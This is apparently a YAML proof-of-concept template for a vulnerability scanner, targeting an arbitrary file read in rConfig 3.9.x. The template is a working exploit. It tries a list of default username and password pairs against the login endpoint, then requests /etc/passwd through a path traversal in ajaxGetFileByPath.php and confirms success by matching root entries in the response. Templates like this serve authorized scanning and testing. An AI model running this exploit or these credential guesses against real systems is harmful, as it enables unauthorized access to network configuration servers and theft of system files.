name: poc-yaml-rconfig-ajaxgetfilebypath-fileread
binding: 017a30a4-93ac-4e3f-8700-c92e5e3d22ac
manual: true
detail:
    author: Xz
    links:
        - https://www.exploit-db.com/exploits/49644
    vulnerability:
        id: CT-120393
        level: medium
    description: rConfig 3.9.x 任意文件读取
    check_action: 需要登录认证user=admin&pass=admin&sublogin=1
transport: http
payloads:
    payloads:
        p1:
            username: |
                "admin"
            password: |
                "123"
        p2:
            username: |
                "admin"
            password: |
                "admin"
        p3:
            username: |
                "admin"
            password: |
                "123456"
        p4:
            username: |
                "admin"
            password: |
                "admin123"
        p5:
            username: |
                "root"
            password: |
                "root"
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /lib/crud/userprocess.php
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: user={{username}}&pass={{password}}&sublogin=1
            follow_redirects: false
        expression: response.status == 302
    r1:
        request:
            cache: true
            method: GET
            path: /lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
            headers:
                Content-Type: application/x-www-form-urlencoded
            follow_redirects: false
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()
